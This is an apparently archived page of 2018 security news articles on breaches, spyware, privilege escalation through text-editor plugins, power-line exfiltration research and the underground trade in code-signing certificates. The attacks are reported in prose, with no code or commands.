- Hacking -

Last update 09.10.2017 13:52:27

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6  7  8  Hacker techniques



Attackers exfiltrated a casino’s high-roller list through a connected fish tank
16.4.2018 securityaffairs Hacking

Nicole Eagan, the CEO of cybersecurity company Darktrace, revealed that is company investigated that hack of an unnamed casino that was breached via a thermometer in a lobby fish tank.
Internet of things devices are enlarging our attack surface, smart devices are increasingly targeted by hackers in the wild.

The case we are going to discuss demonstrate it, Nicole Eagan, the CEO of cybersecurity company Darktrace, revealed that is company investigated that hack of an unnamed casino that was breached via a thermometer in a lobby aquarium.

“There’s a lot of internet of things devices, everything from thermostats, refrigeration systems, HVAC [air conditioning] systems, to people who bring in their Alexa devices into the offices. There’s just a lot of IoT. It expands the attack surface and most of this isn’t covered by traditional defenses.” Nicole Eagan, the CEO of cybersecurity company Darktrace, told the WSJ CEO Council in London on Thursday.

“The attackers used that to get a foothold in the network. They then found the high-roller database and then pulled that back across the network, out the thermostat, and up to the cloud,”

The hackers stole the casino’s high-roller database through a thermometer in the lobby fish tank.

fish tank

This isn’t the first a thermometer hack reported by experts at Darktrace, in July 2017 hackers attempted to exfiltrate data from a US casino by hacking into an Internet-connected fish tank.

A connected fish tank included sensors used to control the temperature, food distribution, and cleanliness of the tank.

“Somebody got into the fish tank and used it to move around into other areas (of the network) and sent out data,” said Justin Fier, Darktrace’s director of cyber intelligence.

At the time, hackers exfiltrated 10 GB of data that were sent out to a device in Finland.


Hackers Can Stealthily Exfiltrate Data via Power Lines
14.4.2018 securityweek Hacking

Researchers have created proof-of-concept (PoC) malware that can stealthily exfiltrate data from air-gapped computers using power lines.

The malware, dubbed PowerHammer, is the work of researchers at the Ben-Gurion University of the Negev in Israel. The university has previously published research on jumping air gaps via magnetic fields, infrared cameras, router LEDs, scanners, HDD activity LEDs, USB devices, the noise emitted by hard drives and fans, and heat emissions.

PowerHammer exfiltrates data from a compromised machine by regulating its power consumption, which can be controlled through the workload of the device’s CPU. Sensitive pieces of information, such as passwords and encryption keys, can be stolen one bit at a time by modulating changes in the current flow.

Researchers have devised two versions of the PowerHammer attack: line level power-hammering and phase level power-hammering.

In the line level variant, the attacker intercepts the bits of data exfiltrated by the malware by tapping the compromised computer’s power cable. In the phase level attack, the attacker collects the data from the main electrical service panel. The data can be harvested using a non-invasive tap that measures the emissions on power cables, and converting them to a binary form via demodulation and decoding.

A computer’s CPU is a significant power consumer and its workload has a direct impact on power consumption and implicitly the flow of current in the device’s power cable. By overloading the CPU with calculations and stopping and starting the workload, it’s possible to generate a signal over the power lines at a specified frequency.

In the case of PowerHammer, the attacker establishes two different frequencies – one representing a “0” bit and another frequency representing a “1” bit.

During their experiments, researchers saw transfer rates of up to 1000 bits/sec for the line level power-hammering attack and 10 bits/sec for the phase level attack. The best transfer rates were achieved on a PC, followed by a server (which had lower bit rates and more errors), and IoT devices (bit rates of up to 20 bits/sec and error rates of up to 18%).

While these can be significant transfer rates for exfiltrating small pieces of information such as passwords – obtaining one character from a string requires 8 bits to be transferred – reliable exfiltration requires more than just sending the raw data. Researchers created 44-bit data frames that, in addition to the actual data being exfiltrated, include a preamble that signals the start of the transmission and 8 bits of CRC code at the end of the frame for error detection.

As for countermeasures, researchers say PowerHammer attacks can be prevented by monitoring power lines for the presence of covert communication channels, by using power line filters to limit the leakage of conduction and radiation noise, and by installing software-level jammers that execute random workloads on the system in order to cause interference in the data transmission process.


SirenJack: Hackers Can Remotely Trigger Warning Sirens
11.4.2018 securityweek  Hacking

Researchers at Bastille, a company that specializes in detecting threats through software-defined radio, have uncovered a new method that can be used to remotely hack emergency warning systems.

Sirens are used worldwide to alert the public of natural disasters, man-made disasters, and emergency situations, including tornadoes, hurricanes, floods, volcanic eruptions, nuclear accidents, chemical spills, and terrorist attacks. False alarms can cause widespread panic and annoyance.

Researchers say they have discovered a new attack method that allows hackers to remotely trigger sirens. This type of attack, dubbed SirenJack, is possible due to a vulnerability found in emergency alert systems made by ATI Systems, a company whose products are used by major cities, universities, military facilities, and industrial sites.

According to Bastille, the vulnerability, related to the use of insecure radio protocol controls, was initially found in the system used by the city of San Francisco and later confirmed at a second installation.

Bastille researcher Balint Seeber started analyzing the city’s outdoor public warning system in 2016 after noticing that it had been using RF communications. An analysis of the system showed that commands were sent without being encrypted, allowing a malicious actor to forge commands.

Attackers need to identify the radio frequency used by the targeted siren and send the system a specially crafted message that triggers an alarm.Sirenjack

“A single warning siren false alarm has the potential to cause widespread panic and endanger lives,” said Chris Risley, CEO of Bastille Networks. “Bastille informed ATI and San Francisco of the vulnerability 90 days ago, to give them time to put a patch in place. We’re now disclosing SirenJack publicly to allow ATI Systems’ users to determine if their system has the SirenJack vulnerability. We also hope that other siren vendors investigate their own systems to patch and fix this type of vulnerability.”

ATI Systems has been made aware of the vulnerability and it has created a patch that adds an additional layer of security to the packets sent over the radio. The company says the patch is being tested and will be made available shortly, but noted that installing it is not an easy task considering that many of its products are designed for each customer’s specific needs.

While Bastille has made it sound like an attack is easy to launch due to the unencrypted protocol, ATI Systems told customers not to panic, pointing out that the cybersecurity firm monitored its product for months before figuring out how to launch an attack.

ATI noted that its current products no longer use the old control protocols that often allowed malicious actors and pranksters to trigger false alarms. However, the company admitted that the system used in San Francisco was installed 14 years ago and acquiring a highly secure system, such as the ones used on military bases, can be too expensive for a city.

This is not the only interesting wireless attack method discovered by researchers at Bastille. The company has also targeted home networks (CableTap), wireless keyboards (KeySniffer), and mouse/keyboard dongles (MouseJack).


Top Music Videos Including 'Despacito' Defaced by Hackers
11.4.2018 securityweek  Hacking

Some of the most popular music videos on YouTube including mega-hit "Despacito" momentarily disappeared Tuesday in an apparent hacking.

Fans looking for videos by top artists including Drake, Katy Perry and Taylor Swift found the footage removed and replaced by messages that included "Free Palestine."

Luis Fonsi's "Despacito" -- the most-watched video of all time at five billion views -- was briefly replaced by an image of a gun-toting gang in red hoods that appeared to come from the Spanish series "Money Heist."

Most videos were back up by early Tuesday US time but some still had defaced captions, which boasted of hacking by a duo calling themselves Prosox and Kuroi'SH.

YouTube, which is owned by search engine giant Google, said that the problem centered on Vevo -- a site backed by music labels that hosts videos -- and not YouTube itself.

"After seeing unusual upload activity on a handful of Vevo channels, we worked quickly with our partner to disable access while they investigate the issue," a YouTube spokesperson said.

Vevo confirmed a security breach on its end and said it had been contained.

"We are working to reinstate all videos affected and our catalog to be restored to full working order. We are continuing to investigate the source of the breach," it said in a statement.

A Twitter user identified as Kuroi'SH threatened more hacks including on the South Korean boy band BTS.

"This is not fake we are real!" he tweeted, adding, "Everything is hack-able."


Top VEVO Music videos Including ‘Despacito’ defaced by hackers
11.4.2018 securityaffairs Hacking

Some of the most popular music VEVO videos on YouTube, including the world’s most popular video ‘Despacito’ has been hacked by a duo calling themselves Prosox and Kuroi’SH.
Some of the most popular music videos on YouTube, including the world’s most popular YouTube video ‘Despacito’ has been hacked.

Popular videos of pop stars like Shakira, Drake, Selena Gomez, Adele, Taylor Swift, and Calvin Harris were replaced by hackers that spread the message “Free Palestine.”

Despacito, the Luis Fonsi’s mega-hit that was watched five billion times was replaced by an image of a group of armed men dressed in hooded sweatshirts that appeared to come from the Spanish series “Money Heist.”

despacito hacked
Source Welivesecurity.com

The videos were hacked by a duo calling themselves Prosox and Kuroi’SH.

All the hacked videos are on singers’ accounts belonging to the VEVO platform that is owned by a group of some of the biggest music corporations.

According to YouTube, the problem doesn’t affect its platform but Vevo.

“After seeing unusual upload activity on a handful of Vevo channels, we worked quickly with our partner to disable access while they investigate the issue,” a YouTube spokesperson said.

Vevo confirmed a security breach on systems.

“We are working to reinstate all videos affected and our catalog to be restored to full working order. We are continuing to investigate the source of the breach,” it said in a statement.

The alleged hacker @ProsoxW3b started posting severs Tweets first saying it has hacked for fun and not for profit.

despacito prosox-tweet


Fin7 hackers stole 5 Million payment card data from Saks Fifth Avenue and Lord & Taylor Stores
3.4.2018 securityaffairs Hacking

FIN7 hackers stole credit and debit card information from millions of consumers who have purchased goods at Saks Fifth Avenue and Lord & Taylor stores.
A new data breach made the headlines, the victim is Saks Fifth Avenue and Lord & Taylor stores. According to the parent company Hudson’s Bay Company (HBC), the security breach exposed customer payment card data, customer payment card data at certain Saks Fifth Avenue, the discount store brand Saks Off 5TH and Lord & Taylor stores in North America are impacted.

“We recently became aware of a data security issue involving customer payment card data at certain Saks Fifth Avenue, Saks OFF 5TH, and Lord & Taylor stores in North America. We identified the issue, took steps to contain it, and believe it no longer poses a risk to customers shopping at our stores.” reads the official statement issued by Lord & Taylor.

“While the investigation is ongoing, there is no indication that this affects our e-commerce or other digital platforms,”

The hackers did not compromise the HBC’s e-commerce or other digital platforms, the company promptly informed authorities and hired security investigators to

“We are working rapidly with leading data security investigators to get our customers the information they need, and our investigation is ongoing. We also are coordinating with law enforcement authorities and the payment card companies,” continues the announcement.

The HBC issued the following statement:

“HBC has identified the issue, and has taken steps to contain it,” the company said in a statement. “Once the Company has more clarity around the facts, it will notify customers quickly and will offer those impacted free identity protection services, including credit and web monitoring. HBC encourages customers to review their account statements and contact their card issuers immediately if they identify activity or transactions they do not recognize.”

The data breach was first reported by threat intelligence firm Gemini Advisory, which noticed the offer for sale of over five million stolen credit and debit cards on a cybercrime marketplace called JokerStash.

Saks Fifth Avenue Lord & Taylor stores

The researchers linked the security breach to the financially-motivated FIN7 APT group also known as Carbanak or Anunak.

The group continuously changed attack techniques and implemented new malware obfuscation methods. The FIN7 group has been active since late 2015, it was highly active since the beginning of 2017.

Fin7 was spotted early 2017 when it targeted personnel involved with the United States Securities and Exchange Commission (SEC) filings at various organizations with a new PowerShell backdoor dubbed POWERSOURCE.

“On March 28, 2018, a notorious hacking JokerStash syndicate, also known as Fin7 announced the latest breach of yet another major corporation, with more than five million stolen payment cards offered for sale on the dark web. Several large financial institutions have confirmed that all tested records had been used before at Saks Fifth Avenue, Saks Fifth Avenue OFF 5TH, a discounted offset brand of luxury Saks Fifth Avenue stores, as well as Lord & Taylor stores.” the company said in a post.

“Several large financial institutions have confirmed that all tested records had been used before at Saks Fifth Avenue, Saks Fifth Avenue OFF 5TH, a discounted offset brand of luxury Saks Fifth Avenue stores, as well as Lord & Taylor stores,”

As of Sunday, only a small portion of compromised records have been offered for sale, crooks offered roughly 35,000 records for Saks Fifth Avenue and 90,000 records for Lord & Taylor.

“As of this writing, approximately 125,000 records have been released for sale, although we expect the entire cache to become available in the following months.” added Gemini.

At the time of writing HBC did not provide details on the extent of the security breach, it is still unclear how the hackers have stolen payment card data, experts believe hackers may have compromised point-of-sale systems.

“Based on the analysis of records that are currently available, it appears that all Lord & Taylor and 83 US based Saks Fifth Avenue locations have been compromised. In addition, we identified three potentially compromised stores located in Ontario, Canada. However, the majority of stolen credit cards were obtained from New York and New Jersey locations.” concluded Gemini.


Philippine central bank has thrown an alert after SWIFT hackers hit Malaysia central bank
2.4.2018 securityaffairs Hacking

The Philippine central bank has thrown an alert to local financial institutions following a cyber attack against the SWIFT servers at the Malaysian central bank.
The Philippine central bank has thrown an alert to local financial institutions following a cyber attack against the Malaysian central bank.

According to Malaysian governor, the hackers attempted to steal money through fraudulent wire transfers, the good news is that the attack failed.

Bank Negara Malaysia confirmed that no funds were lost in the cyber attack, the hackers sent fake wire-transfer requests over the SWIFT bank messaging network to the target bank in order to trick it to transfer the money.

“We issued a general alert reminder as soon as we got BNM advisory to be extra careful over the long holiday. Although banks already do that as SOP (standard operating procedure),”Bangko Sentral ng Pilipinas Governor Nestor Espenilla said in a phone message.

“Information sharing is part of enhanced defensive protocols against cyber-crime,”.
At the time of writing is still unclear who is behind the attack or the way the hacker breached the SWIFT systems used by the bank.

“Bank Negara did not say who was behind the hack or how they accessed its SWIFT servers. The central bank, which supervises 45 commercial banks in Malaysia, said on Thursday there was no disruption to other payment and settlement systems the central bank operates because of the cyber attack.” reported the Straits Times.

SWIFT

Bank Negara said it had taken additional security measures to protect its stakeholders.

“All unauthorised transactions were stopped through prompt action in strong collaboration with SWIFT, other central banks and financial institutions,” it said in a statement.

The Philippine banks were also involved in the clamorous 2016 cyber heist when hackers stole US$81 million from the Bangladesh central bank, at the time the hackers transferred money into several accounts at Manila-based Rizal Commercial Banking Corp (RCBC) and then used them into the local casino industry.
The Philippine central bank fined RCBC a record one billion pesos (US$20 million) in 2016 for the failure to prevent the fraudulent transfers of money.

RCBC sustained that a rogue employee was responsible for the movement.

Mr Abu Hena Mohd. Razee Hassan, deputy governor of Bangladesh Bank, said the latest attack against the Malaysian central bank showed that the SWIFT platform remained vulnerable.

“After the attack on our central bank, SWIFT took several measures to protect the system globally but yet this is happening, meaning criminals have more ability and more capable weapons,” Mr Razee Hassan told Reuters in Dhaka.

“So this is the time to further improve the financial transfer system globally.”


Under Armour data breach affected about 150 million MyFitnessPal users
30.3.2018 securityaffairs Hacking

Under Armour became aware of a potential security breach on March 25, the company said an unauthorized party had accessed MyFitnessPal user data.
Under Armour learned of the data breach on March 25, it promptly reported the hack to law enforcement and hired security consultants to investigate the incident.

Attackers hacked the MyFitnessPal application that is used by its customers to track fitness activity and calorie consumption.

MyFitnessPal under armour

According to the firm, an unauthorized party obtained access to user data, including usernames, email addresses, and “hashed” passwords.

The good news is that hackers did not access financial data (i.e. payment card data) or social security numbers and drivers licenses.

“On March 25, the MyFitnessPal team became aware that an unauthorized party acquired data associated with MyFitnessPal user accounts in late February 2018. The company quickly took steps to determine the nature and scope of the issue and to alert the MyFitnessPal community of the incident.” reads a statement issued by the company.

“The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers), which the company does not collect from users. Payment card data was also not affected because it is collected and processed separately. The company’s investigation is ongoing, but indicates that approximately 150 million user accounts were affected by this issue.”

The company notified de data breach by email and in-app messaging to update settings to protect account information.

“The notice contains recommendations for MyFitnessPal users regarding account security steps they can take to help protect their information. The company will be requiring MyFitnessPal users to change their passwords and is urging users to do so immediately.” continues the statement.


Plugins for Popular Text Editors Could Help Hackers Gain Elevated Privileges
17.3.2018 thehackernews Hacking

Whether you're a developer, designer or a writer, a good text editor always help you save time and make you work more efficiently.
For example, I use Sublime a lot while programming because it includes some useful tools like 'syntax highlighting' and 'autocomplete' that every advanced text editor should have.
Moreover, these advanced text editors also offer users extensibility, allowing users to install and run third-party plugins to extend the editor's functionality and most importantly its scope.
However, it's a known fact that third-party plugins always pose a significant risk of hacking, whether it's about WordPress plugins or Windows' extensions for Chrome, Firefox or Photoshop.
SafeBreach researcher Dor Azouri analyzed several popular extensible text editors for Unix and Linux systems, including Sublime, Vim, Emacs, Gedit, and pico/nano, and found that except for pico/nano, all of them are vulnerable to a critical privilege escalation flaw that could be exploited by attackers to run malicious code on a victims’ machines.
"This method succeeds regardless of the file being opened in the editor, so even limitations commonly applied on sudo commands might not protect from it," the paper reads [pdf]
"Technical users will occasionally need to edit root-owned files, and for that purpose they will open their editor with elevated privileges, using ‘sudo.’ There are many valid reasons to elevate the privileges of an editor."
The issue resides in the way these text editors load plugins. According to the researcher, there's inadequate separation of regular and elevated modes when loading plugins for these editors.
Their folder permissions integrity is not maintained correctly, which opens the door for attackers with regular user permissions to elevate their privileges and execute arbitrary code on the user's machine.
A simple malvertising campaign could allow attackers spread malicious extension for vulnerable text editors, enabling them to run malicious code with elevated privileges, install malware and remotely take full control of targeted computers.
Azouri suggests Unix users can use an open-source host-based intrusion detection system, called OSSEC, to actively monitoring system activity, files integrity, logs, and processes.
Users should avoid loading 3rd-party plugins when the editor is elevated and also deny write permissions for non-elevated users.
Azouri advised developers of text editors to change the folders and file permission models to complete the separation between regular and elevated modes and if possible, provide a manual interface for users to approve the elevated loading of plugins.


Hackers can elevate privileges by hacking into popular text editors
17.3.2018 securityaffairs Hacking

Following recent string of attacks that exploit flawed plugins, researchers at SafeBreach examined 6 popular extensible text editors for unix systems.
Most of the modern text editors allow users to extend their functionalities by using third-party plugins, in this way they are enlarging their attack surface.

Third-party plugins could be affected by vulnerabilities that could be exploited by hackers to target our systems.

The situation is particularly severe in case the flaw affects a plugin for popular software such as WordPress or Windows’ extensions for Chrome, Firefox or Photoshop.

Dor Azouri, a researcher at SafeBreach, has analyzed several popular extensible text editors for both Unix and Linux systems discovered that except for pico/nano all of them are affected by a critical privilege escalation flaw.

“We examined several popular editors for unix environments. Our research shows how these text editors with third-party plugins can be used as another way to gain privilege escalation on a machine. This method succeeds regardless of the file being opened in the editor, so even limitations commonly applied on sudo commands might not protect from it.” states the blog post published by SafeBreach.

“The set of editors that were put to the test include: Sublime, Vim, Emacs, Gedit, pico/nano.”

Emacs text editors

An attacker can exploit the flaw to run malicious code on a victims’ machines running the vulnerable text editor.

“This method succeeds regardless of the file being opened in the editor, so even limitations commonly applied on sudo commands might not protect from it,” reads the paper published by the company.

“Technical users will occasionally need to edit root-owned files, and for that purpose they will open their editor with elevated privileges, using ‘sudo.’ There are many valid reasons to elevate the privileges of an editor.”

The vulnerability ties the way these text editors load plugins because they don’t properly separate regular and elevated modes when loading plugins.

Attackers with regular user permissions can access the folder permissions to elevate their privileges and execute arbitrary code on the user’s machine.

Azouri suggests Unix users use an open-source host-based intrusion detection system called OSSEC. Of course, users should avoid loading 3rd-party plugins when the editor is elevated and also deny write permissions for non-elevated users.

Below the full list of mitigations provided by the experts:

implement OSEC monitoring rules
deny write permisions for non-elevated users
change folders and file permission models to ensure separation between regular and elevated modes.
Prevent loading of 3rd party plugins when an editor is elevated.
Provide a manual interface to approve the elevated loading of plugins.


Hackers Can Abuse Text Editors for Privilege Escalation
15.3.2018 securityweek Hacking

Several popular text editors can be leveraged for privilege escalation and their developers do not plan on taking any action to prevent abuse, according to SafeBreach, a company that specializes in simulating attacks and breaches.

Some text editors allow users to run third-party code and extend the application’s functionality through extensions. While this provides some benefits, an expert determined that it can also introduce security risks.

SafeBreach researcher Dor Azouri has analyzed the Sublime, Vim, Emacs, Gedit, pico and nano text editors, and found that only pico and its clone, nano, are not prone to abuse, mainly due to the fact that they offer only limited extensibility.

One part of the problem is that users — particularly on Linux servers — may often need to execute text editors with elevated privileges. If an attacker can plant malicious extensions in locations specific to the targeted text editor, their code will get executed with elevated privileges when the application is launched or when certain operations are performed.

Text editors allow privilege escalation

For an attack to work, the attacker needs to somehow hijack a legitimate user account that has regular privileges, which can be achieved through phishing, social engineering and other methods. In the case of a malicious insider, the vulnerability found by SafeBreach can be useful for executing code with elevated privileges if their permissions have been restricted by the system administrator to certain files and commands.

Depending on the targeted editor, the attacker needs to create specially crafted scripts or package files, and place them in specific plugin directories. In some cases, the hacker may need to create additional files and enable extensions in order for the attack to work, but this should not be difficult if they have access to a less-privileged account.

In the case of Emacs, for example, attackers simply need to add one line of code to the “init.el” file in order to get their code executed on startup. Azouri noted that editing the init file does not require root permissions. A report published on Thursday by SafeBreach details how privilege escalation can be achieved through each of the tested editors.

While there are no reports of malicious attacks abusing text editors for privilege escalation, incidents involving abuse of extensibility are not unheard of. For instance, Kite, which offers Python code enhancements and suggestions for several popular editors via extensions, drew criticism last year after integrating promotional links into its users’ coding apps.

SafeBreach also pointed to a couple of incidents related to npm packages that resulted in malicious code getting loaded and applications breaking. Azouri has described several possible scenarios involving post-exploitation techniques that can be leveraged to gain root access on Unix-like systems.

“Badly configured Cron jobs, that are a natural part in Unix-like systems, can be abused to get root access. In a similar manner to the technique we present, an attacker might find binaries in cron jobs which are writable, and modify them to his/her needs. They are then executed as root by the OS (or other users, depending on the cron job settings), giving the attacker privileged execution,” Azouri told SecurityWeek.

Another example involves exploiting file permissions, such as special SUID executables. “SUID is a feature in Unix-like systems that allows configuring some executables to run as a specific user (the owner of the file). Finding a file that is owned by root and is set with SUID, can give a way for an attacker to get privileged execution,” the researcher said.

He added, “Some cases exist where the developers of 3rd party plugins, after gaining popularity for their plugin, updated the plugin's code with malicious code (either intentionally or unintentionally, the latter can be as a result of getting hacked and the attacker obtained access to the codebase). This update was downloaded by the plugin users, and then executed without them being aware of the malicious change.”

The developers of the text editors analyzed by SafeBreach said they don’t plan on making any changes to prevent this type of abuse. Vim developers admitted that they can take measures, but they appear to believe that it’s the user’s responsibility to defend against these attacks.

Emacs developers will not make any changes to their application due to the fact that this type of privilege escalation can leverage many apps and releasing a patch on their end would not completely address the issue.

Gedit has yet to confirm SafeBreach’s findings and Sublime has not provided researchers any updates after acknowledging their bug report.


Study confirms the trade of code-signing certificates is a flourishing business
13.3.2018 securityaffairs Hacking

According to a new study conducted by American and Czech researchers, the trade of code-signing certificates is a flourishing business.
Code-signing certificates are precious commodities in the dark web, according to a new study conducted by American and Czech researchers and Symantec Labs technical director Christopher Gates their trade is a flourishing business.

The experts pointed out that the demand for code-signing certificates is increased because vxers have started using them to bypass security solutions such as Microsoft’s Windows Defender SmartScreen.

“While prior studies have reported the use of code-signing certificates that had been compromised or obtained directly from legitimate Certification Authorities, we observe that, in 2017, these methods have become secondary to purchasing certificates from underground vendors.” states the research paper published by the experts.

“We also find that the need to bypass platform protections such as Microsoft Defender SmartScreen plays a growing role in driving the demand for Authenticode certificates. Together, these findings suggest that the trade in certificates issued for abuse represents an emerging segment of the underground economy.”

The experts conducted an in-depth analysis of this underground trade, considering vendors, malware developers, and certificate issuers, focusing their investigation on the vendor’s market share and the factors that most of all drive the demand in the market. The experts inspected 28 forums, 6 link directory websites, 4 general marketplaces
and dozens of websites treating black market goods.

They identified four leading vendors of code-signing certificates, one of them named Codesigning Guru set up his own e-shop in August 2017. The researchers regularly collected stock information in a 104 day-period and analyzed the sales. The e-shop obtained a new certificate every two days, on average, and collected $16,150 in revenue for selling these certificates. A new codesigning certificate generally trades for a few hundred dollars. Extended Validation (EV) code-signing certificates can also be purchased for a few thousand dollars each, sellers provide the 2FA hardware tokens they are bound to them being shipped by post.

Microsoft Defender SmartScreen is a reputation-based system, every time encounters a certificate for the first time, it will raise a warning the user has to click-through during installation.

To avoid warning being displayed the attackers need a positive reputation for the certificate, this could be obtained by first using it to sign benign programs and installing them on many client machines.

The price for Extended Validation code-signing certificates is higher because they came with a positive SmartScreen reputation. The prices for EV certificates range from $1,600 up to $7,000 for certificates with the best SmartScreen reputation.

“EV certificates are much more expensive. Earlier posts by vendor C list the price of $1600 while more up-to-date posts by the same vendor C offer EV certificates for $3000. Vendor B sells EV certificates for $2500 (both in the forums and in the Codesigning Guru e-shop).” continues the paper.

“This high price is probably due to the extensive vetting process and the fact that the 2FA hardware token needs to be send by post to the customer that buys the EV certificate.”

The researchers also analyzed the publishers noted in the certificates using the beta version of the British public register of companies and the result was suspicious.

The doubt is that some companies were set up specifically for certificate abuse.

“All of the publishers were rather young companies, some of them being incorporated around a month before their code-signing certificate was issued and most of those did not have software development as their primary focus.” continues the paper.

Researchers noticed that most of the activity was originated in Russia.

Code-signing certificates

Certificate Authorities have to vet applicants with care and once a malicious publisher is identified all certificates from that publisher should be revoked.


New Hacking Team Spyware Samples Detected: ESET
12.3.2018 securityweek Hacking

New samples of Hacking Team’s Remote Control System (RCS) flagship spyware have recently emerged, slightly different from previously observed variations, ESET warns.Hacking Team, an Italian spyware vendor founded in 2003, is well known for selling surveillance tools to governments worldwide. In 2015, the firm was hacked, which led to 400GB of internal data being leaked online, including a list of customers, internal communications, and spyware source code.

Not only did the incident expose Hacking Team’s activities and force it to ask customers to suspend all use of RCS, but it also resulted in various actors using the leaked code and exploits as part of their own malicious operations.

Following the data breach, the Hacking Team was facing an uncertain future, but the first reports of it resuming activity came only half a year later, when a new sample of the firm’s Mac spyware apparently emerged. In the meantime, the firm has received an investment by a company named Tablem Limited, which is officially based in Cyprus but appears to have ties to Saudi Arabia.

Hacking Team’s top product, RCS, is a tool that packs all the functionality one would expect from a backdoor: it is capable of extracting files from a targeted device, intercepting emails and instant messaging, and remotely activating the webcam and microphone.

The newly discovered RCS samples, ESET says, were compiled between September 2015 and October 2017 and can be traced to a single group, rather than being built by various actors from the leaked source code. Furthermore, they have been signed with a previously unseen valid digital certificate, issued by Thawte to a company named Ziber Ltd.

The new variants include forged Manifest metadata to masquerade as a legitimate application and their author used VMProtect in an attempt to add detection evasion to them, a feature “common among pre-leak Hacking Team spyware,” ESET points out.

What suggests that these samples might have been built by the Hacking Team developers themselves includes the versioning, which continues from where Hacking Team left off before the breach and which follows the same patterns. ESET also discovered that changes introduced in the post-leak updates fall in line with Hacking Team’s coding style and show deep familiarity with the code.

“It is highly improbable that some other actor – that is, other than the original Hacking Team developer(s) – would make changes in exactly these places when creating new versions from the leaked Hacking Team source code,” the security company says.

The researchers also discovered a subtle difference in Startup file size. In the samples before the leak, the file copy operation was padded to 4MB, while in the post-leak variants it is padded to 6MB.

The spyware’s capabilities remained the same, with no significant update released to date, although the firm said after the leak that it would push a new solution. In two different cases, the observed distribution vector was an executable file disguised as a PDF document and sent to the victim via a spear-phishing email.

“Our research lets us claim with high confidence that, with one obvious exception, the post-leak samples we’ve analyzed are indeed the work of Hacking Team developers, and not the result of source code reuse by unrelated actors, such as in the case of Callisto Group in 2016,” ESET says.

The security firm claims the new Hacking Team spyware samples have been already detected in fourteen countries, but decided not to disclose the names of those countries. Furthermore, the company kept other newly uncovered details secret, to prevent interference with the future tracking of the group.


Hacking Team is back … probably it never stopped its activity. Watch Out!
12.3.2018 securityaffairs Hacking

ESET collected evidence of Hacking Team ‘activity post-hack, the company published an interesting analysis based on post hack samples found in the wild.
Security researchers at ESET have spotted in fourteen countries previously unreported samples of the Remote Control System (RCS), the surveillance software developed by the Italian Hacking Team, in fourteen countries.

Malware researchers that analyzed the sample believe that the Hacking Team developers are continuing the development of the surveillance malware.

Since 2003, Hacking Team gained notoriety for selling surveillance tools to governments and intelligence agencies, but human rights research group criticized its alleged sales to the authoritarian regimes.

The Remote Control System (RCS) is a sophisticated spyware that is able to transform the device in a surveillance tool by activating the webcam and microphone, extracting information from a targeted device, and intercepting emails and instant messaging.

The company made the headlines in July 2015 when it suffered a major security breach and attackers exfiltrated 400GB of internal data, including the spyware source code.

After the hack, Hacking Team was forced to request its customers to stop all the operation and don’t use the spyware.

“The first reports suggesting Hacking Team’s resumed operations came six months later – a new sample of Hacking Team’s Mac spyware was apparently in the wild.” states the analysis published by ESET.

“A year after the breach, an investment by a company named Tablem Limited brought changes to Hacking Team’s shareholder structure, with Tablem Limited taking 20% of Hacking Team’s shareholding. Tablem Limited is officially based in Cyprus; however, recent news suggests it has ties to Saudi Arabia.”

The experts started the investigation after researchers from the Citizen Lab provided them information that led to the discovery of a version of the RCS software signed with a previously unseen valid digital certificate.

The researchers uncovered many samples of Hacking Team spyware created after the 2015 data breach, their code implements some changes compared to variants released before the source code leak.

“The samples were compiled between September 2015 and October 2017. We have deemed these compilation dates to be authentic, based on ESET telemetry data indicating the appearance of the samples in the wild within a few days of those dates.” continues the analysis.

“Further analysis led us to conclude that all the samples can be traced back to a single group, rather than being isolated instances of diverse actors building their own versions from the leaked Hacking Team source code.”

ESET found six different certificates issued in succession, four of them were issued by Thawte to four different companies, and two were issued to the Hacking Team co-founder Valeriano Bedeschi and a guy named Raffaele Carnacina.

The samples analyzed have forged Manifest metadata to trick users into believing that they are using legitimate applications such as “Advanced SystemCare 9 (9.3.0.1121)”, “Toolwiz Care 3.1.0.0” and “SlimDrivers (2.3.1.10)”.

To avoid detection vxers behind the samples have been using VMProtect, a technique observed also in Hacking Team spyware used before the HT hack.

The researchers believe that Hacking Team developers have developed the post-leak samples and no other APT that would have borrowed their code,

“We have, however, collected further evidence that ties these post-leak samples to Hacking Team’s developers themselves.” continues ESET.

“The connections among these samples alone could have originated with virtually any group re-purposing the leaked Hacking Team source code or installer – as was the case with Callisto Group in early 2016. We have, however, collected further evidence that ties these post-leak samples to Hacking Team’s developers themselves.”

The samples analyzed continues the versioning progression used in pre-leak samples, experts also noticed that the same names (Scout and Soldier) in the samples that were also present in past codes.

The researchers also discovered a subtle difference between the pre-leak and the post-leak samples is the difference in Startup file size. They pointed out that before the leak, the size of the copied file is 4MB, meanwhile, in the post-leak samples this file copy operation is padded to 6MB, most likely as a primitive detection evasion technique.

In the following table, there is the timeline associated with Hacking Team Windows spyware samples. The red item is the code reuse attributed to the Callisto APT Group.

hacking Team samples

The experts found further differences that led them to attribute the new sample to the original HT development team, but they avoided to disclose them to continue to track the group.

The post-leak samples analyzed by the researchers, at least in two cases, were delivered in spear phishing message with an executable file disguised as a PDF document.

“Furthermore, our research has confirmed that the changes introduced in the post-leak updates were made in line with Hacking Team’s own coding style and are often found in places indicating a deep familiarity with the code.” concludes ESET.

“It is highly improbable that some other actor – that is, other than the original Hacking Team developer(s) – would make changes in exactly these places when creating new versions from the leaked Hacking Team source code.”


Equifax Identifies 2.4 Million More Affected by Massive Hack
2.3.2018 securityweek  Hacking

US credit bureau Equifax said Thursday it identified an additional 2.4 million American consumers affected by last year's massive data breach that sparked a public outcry and a congressional probe.

The company's forensic investigation revealed the new identities on top of the 146 million affected in the attack that exposed victims' personal details, including names, birth dates and social security numbers.

"This is not about newly discovered stolen data," said Paulino do Rego Barros, who took over as interim chief executive last year at the scandal-hit credit agency.

"It's about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals."

Equifax said the newly identified consumers were not previously informed because their social security numbers -- which appeared to be the focus of the hackers -- were not stolen together with their partial driver's license information.

Equifax said it would notify these consumers and will offer identity theft protection and credit file monitoring services.

The Atlanta-based company, which tracks consumer financial data to help establish credit ratings, is now facing state and federal investigations as well as class-action lawsuits over the breach.

While the breach was not the largest in history, it has been considered among the most damaging because of the sensitive information held by Equifax and the potential for that data to be used in identity theft or other crimes.


Hackers compromised a Tesla Internal Servers with a Cryptocurrency miner
23.2.2018 securityaffairs Hacking

Cloud security firm RedLock discovered that hackers have compromised the Tesla cloud computing platform to mine cryptocurrency.
